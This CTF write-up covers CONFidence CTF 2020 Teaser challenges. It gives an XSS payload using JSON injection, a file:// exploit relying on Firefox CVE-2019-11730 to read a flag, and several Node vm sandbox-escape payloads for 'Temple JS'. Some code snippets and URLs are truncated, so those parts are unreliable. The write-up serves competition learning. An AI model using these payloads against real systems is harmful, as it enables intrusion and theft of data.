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File metadata and controls

247 lines (169 loc) · 7.7 KB

CONFidence CTF 2020 Teaser

It's recommended to read our responsive web version of this writeup.


cat web

The server uses AJAX APIs to render the website content. The API endpoint is like this:


{"status": "ok", "content": ["il_570xN.1285759626_8j8m.jpg", "24.jpg", "2468b5d0-67e8-4d77-9bbb-87a656c8087a-large3x4_Untitledcollage.jpg"]}

Let's quickly fuzz a little bit:


{"status": "ok", "content": ["", "uwsgi.ini", "", "templates", "static", ""]}


{"status": "ok", "content": ["report.html", "index.html", "flag.txt"]}

So the flag.txt is in the templates directory. Also, the response contains access-control-allow-origin: * which allows cross-origin read.

Next, there is a XSS bot on the index page. We have to find a XSS point. The /cats?kind= API will return the raw error message in JSON without encoding the HTML.<h1>hi</h1>

{"status": "error", "content": "<h1>h1</h1> could not be found"}

However, the content-type header is application/json. We can't do much here. Instead we have to take advantages of the AJAX in the index page

function getNewCats(kind) {                                                     
  $.getJSON(''+kind, function(data) {
      if(data.status != 'ok')
      cats = data.content;
      cats.forEach(function(cat) {
        var newDiv = document.createElement('div');
        newDiv.innerHTML = '<img style="max-width: 200px; max-height: 200px" src="static/'+kind+'/'+cat+'" />';


$(document).ready(function() {
    $('#cat_select').change(function() {
        var kind = $(this).val();
        history.pushState({}, '', '?'+kind)
    var kind =;
    if(kind == "")
    kind = 'black';

By overwriting the JSON status and using \u0022 to encode the ", we can trigger a XSS.

/?foo","content":["\u0022><img src=x onerror=alert(1)>"],"status":"ok","bar":"

We have a XSS now, but how do we read the flag?

The idea is to abuse file:/// and XSS to extract the flag.

The UA of XSS bot is Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.

That's a rather old Firefox. We start to search for CVE and security fix and got this CVE-2019-11730: Same-origin policy treats all files in a directory as having the same-origin.

The rest is straightforward. In firefox 67 the files in the directory /app/templates/ are all considered as same-origin. We can utilize XSS on file:// to retrieve the flag.

Report this url:

file:///app/templates/index.html?foo","content":["\u0022><script src=></script>"],"status":"ok","bar":"



The flag is p4{can_i_haz_a_piece_of_flag_pliz?}.

This is a great challenge! Really enjoy it :)

Failed Attempts

  • XSS through localhost to RCE via Flask debug page: However the Flask debug is not enabled on localhost, and Flask console is protected by PIN.

Temple JS (unsolved)

Written by bookgin

The server code:

const express = require("express")
const fs = require("fs")
const vm = require("vm")
const watchdog = require("./watchdog");

global.flag = fs.readFileSync("flag").toString()
const source = fs.readFileSync(__filename).toString()
const help = "There is no help on the way."

const app = express()
const port = 3000

app.use('/', express.static('public'))'/repl', (req, res) => {
    let sandbox = vm.createContext({par: (v => `(${v})`), source, help})
    let validInput = /^[a-zA-Z0-9 ${}`]+$/g
    let command = req.body['cmd']
    console.log(`${req.ip}> ${command}`)

    let response;

    try {
            let watch = watchdog.schedule()
            try {
                response = vm.runInContext(command, sandbox, {
                    timeout: 300,
                    displayErrors: false
            } finally {
        } else
            throw new Error("Invalid input.")
    } catch(ex)
        response = ex.toString()

    console.log(`${req.ip}< ${response}`)
    res.send(JSON.stringify({"response": response}))

console.log(`Listening on :${port}...`)
app.listen(port, '')

Basically we need to read flag in the sandbox with limited characters.

To escape the sandbox, we follow this article to access the object outside of the sandbox.

constructor.constructor('return flag')()

However, . is not allowed. We need to either create . based on those limited chracters, or use other syntax to access the attributes.

First, we will need eval() to create .. In javascript we can use Function to achieve eval:

# eval
> Function`return 123``foo`

# double evaluation
> Function` foo${`return ${1+1}`}`` `

However, in the end I didn't manage to solve this challenge because I'm a javascript noob.......

Here are some creative solutions:

  1. Destruct by @sasdf:
Function`a${`return constructor`}{constructor}` `${constructor}` `return flag` ``

This one didn't even use the helper function par. Always amazed by our member @sasdf !

  1. for-loop dot creation by @qweqwe:
{var dot} {Function`x ${`for ${par`dot of help`} { } return dot`}` ``} {Function`x ${`return constructor${dot}constructor`}` `` `return flag` ``}

It uses for (dot of help) { } return dot to create ..

  1. with() by @toob:
Function`a${`with ${par`par`} return constructor`}` `` `return flag` ``

Actually I was closed to this one, but I found with could be useful in the last 20 minutes of the CTF......


Angry Defender (unsolved)

This is based on @t0nk42 (icchy)'s research on Windows Defender. Alexei Bulazel also did some research on the emulator.

Because in this challenge the flag is directly appended into the files, without the close tag </body> it seems not possible to extract the content with JavaScript. See my write-up for more details.

The hint indicates this but we're still trying to use javascript and other Interpreted language (php) to extract the flag. PHP seems promising but we can't construct a valid payload. The intended solution is to utilize Windows binary file.

For write-ups by other teams please see: